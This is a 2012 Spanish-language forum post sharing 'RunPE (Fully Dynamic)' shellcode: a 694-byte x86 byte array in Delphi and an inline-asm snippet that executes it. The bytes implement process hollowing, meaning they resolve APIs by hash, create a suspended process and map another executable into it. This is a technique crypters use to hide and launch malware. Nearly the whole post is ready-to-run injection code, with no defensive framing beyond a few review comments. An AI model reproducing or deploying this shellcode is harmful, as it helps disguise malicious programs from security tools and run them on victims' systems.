[SNIPPET] Shellcode RunPE (Fully Dynamic)

Iniciado por Expermicid, Junio 24, 2012, 01:23:34 AM



Junio 24, 2012, 01:23:34 AM Última modificación: Abril 21, 2013, 01:08:17 PM por Expermicid
RunPE creado por DeadlyVermilion

Código: delphi
var
  // arrRunPE: raw shellcode supplied by the post (694 bytes, array[0..693]),
  // labelled "RunPE (Fully Dynamic)" and credited to DeadlyVermilion. This is
  // not source code: the bytes cannot be reviewed, rebuilt or audited from this
  // listing, so the array is an opaque, untrusted binary. Its input convention,
  // the registers it clobbers and its return state are not documented on this
  // page; the only usage shown loads one value into EAX and CALLs the first byte.
  arrRunPE:  array[0..693] of Byte = (
    $55,$8B,$EC,$81,$C4,$A4,$FA,$FF,$FF,$89,$45,$FC,$E8,$1B,$02,$00,$00,$89,$85,$CC,
    $FD,$FF,$FF,$BB,$F2,$0F,$56,$C6,$8B,$95,$CC,$FD,$FF,$FF,$E8,$19,$02,$00,$00,$89,
    $45,$F8,$BB,$A9,$8B,$80,$2D,$8B,$95,$CC,$FD,$FF,$FF,$E8,$06,$02,$00,$00,$89,$45,
    $F4,$BB,$85,$3B,$AE,$DB,$8B,$95,$CC,$FD,$FF,$FF,$E8,$F3,$01,$00,$00,$89,$45,$F0,
    $BB,$93,$35,$DF,$85,$8B,$95,$CC,$FD,$FF,$FF,$E8,$E0,$01,$00,$00,$89,$45,$EC,$BB,
    $8D,$CB,$B6,$5D,$8B,$95,$CC,$FD,$FF,$FF,$E8,$CD,$01,$00,$00,$89,$45,$E8,$BB,$53,
    $13,$C1,$78,$8B,$95,$CC,$FD,$FF,$FF,$E8,$BA,$01,$00,$00,$89,$45,$E4,$BB,$8A,$DB,
    $DF,$A5,$8B,$95,$CC,$FD,$FF,$FF,$E8,$A7,$01,$00,$00,$89,$45,$E0,$BB,$2E,$05,$50,
    $C8,$8B,$95,$CC,$FD,$FF,$FF,$E8,$94,$01,$00,$00,$89,$45,$DC,$BB,$85,$A1,$16,$A2,
    $8B,$95,$CC,$FD,$FF,$FF,$E8,$81,$01,$00,$00,$E8,$06,$00,$00,$00,$6E,$74,$64,$6C,
    $6C,$00,$5F,$57,$FF,$D0,$89,$85,$D0,$FD,$FF,$FF,$BB,$8B,$E3,$CD,$41,$8B,$D0,$E8,
    $60,$01,$00,$00,$89,$45,$D8,$BB,$39,$23,$0D,$2C,$8B,$95,$D0,$FD,$FF,$FF,$E8,$4D,
    $01,$00,$00,$89,$45,$D4,$68,$00,$02,$00,$00,$8D,$85,$D4,$FD,$FF,$FF,$50,$6A,$00,
    $FF,$55,$F8,$6A,$44,$8D,$85,$88,$FD,$FF,$FF,$50,$FF,$55,$D4,$FF,$55,$F4,$8B,$C8,
    $8D,$85,$78,$FD,$FF,$FF,$50,$8D,$85,$88,$FD,$FF,$FF,$50,$6A,$00,$6A,$00,$6A,$04,
    $6A,$00,$6A,$00,$6A,$00,$51,$8D,$85,$D4,$FD,$FF,$FF,$50,$FF,$55,$F0,$68,$CC,$02,
    $00,$00,$8D,$85,$A4,$FA,$FF,$FF,$50,$FF,$55,$D4,$C7,$85,$A4,$FA,$FF,$FF,$02,$00,
    $01,$00,$8D,$85,$A4,$FA,$FF,$FF,$50,$FF,$B5,$7C,$FD,$FF,$FF,$FF,$55,$EC,$64,$A1,
    $30,$00,$00,$00,$8B,$40,$0C,$8B,$40,$14,$8B,$40,$10,$50,$FF,$B5,$78,$FD,$FF,$FF,
    $FF,$55,$D8,$8B,$7D,$FC,$03,$7F,$3C,$6A,$40,$68,$00,$30,$00,$00,$FF,$77,$50,$FF,
    $77,$34,$FF,$B5,$78,$FD,$FF,$FF,$FF,$55,$E8,$89,$85,$74,$FD,$FF,$FF,$6A,$00,$FF,
    $77,$54,$FF,$75,$FC,$FF,$B5,$74,$FD,$FF,$FF,$FF,$B5,$78,$FD,$FF,$FF,$FF,$55,$E4,
    $8D,$47,$18,$89,$85,$70,$FD,$FF,$FF,$0F,$B7,$47,$14,$01,$85,$70,$FD,$FF,$FF,$33,
    $C0,$33,$F6,$33,$C9,$EB,$29,$6B,$C6,$28,$03,$85,$70,$FD,$FF,$FF,$8B,$9D,$74,$FD,
    $FF,$FF,$03,$58,$0C,$8B,$55,$FC,$03,$50,$14,$6A,$00,$FF,$70,$10,$52,$53,$FF,$B5,
    $78,$FD,$FF,$FF,$FF,$55,$E4,$46,$66,$3B,$77,$06,$72,$D1,$8B,$85,$74,$FD,$FF,$FF,
    $03,$47,$28,$89,$85,$54,$FB,$FF,$FF,$8D,$85,$A4,$FA,$FF,$FF,$50,$FF,$B5,$7C,$FD,
    $FF,$FF,$FF,$55,$E0,$FF,$B5,$7C,$FD,$FF,$FF,$FF,$55,$DC,$C9,$C3,$64,$A1,$30,$00,
    $00,$00,$8B,$40,$0C,$8B,$40,$0C,$8B,$00,$8B,$00,$8B,$40,$18,$C3,$55,$8B,$EC,$83,
    $C4,$F4,$52,$89,$55,$FC,$8B,$4A,$3C,$03,$CA,$89,$4D,$F4,$8B,$49,$78,$03,$CA,$89,
    $4D,$F8,$8B,$51,$18,$8B,$49,$20,$03,$4D,$FC,$33,$FF,$8B,$31,$03,$75,$FC,$33,$C0,
    $51,$AC,$8B,$C8,$03,$F8,$D3,$C7,$85,$C0,$75,$F5,$59,$3B,$FB,$74,$10,$83,$C1,$04,
    $4A,$75,$E0,$BA,$C2,$58,$62,$1B,$5A,$33,$C0,$C9,$C3,$8B,$45,$FC,$8B,$4D,$F8,$8B,
    $59,$18,$8B,$49,$24,$03,$C8,$2B,$DA,$D1,$E3,$03,$CB,$0F,$B7,$19,$8B,$4D,$F8,$8B,
    $49,$1C,$03,$C8,$C1,$E3,$02,$03,$CB,$03,$01,$5A,$C9,$C3);


Modo de uso:

Código: delphi
asm
  // Single input shown for the blob: the value of dwArrayToRun (declared
  // elsewhere, not on this page) is handed over in EAX.
  MOV EAX, dwArrayToRun
  // Address of the first byte of the array -- a data object, not a function.
  LEA EBX, arrRunPE[0]
  // Transfers control into the byte array, i.e. executes data as code. What the
  // blob clobbers, preserves or returns is undocumented here.
  // NOTE(review): Delphi inline asm is expected to leave EBX intact; whether the
  // compiler saves/restores it around this block is not visible here -- confirm.
  CALL EBX
end;


Saludos

Fuente: ic0de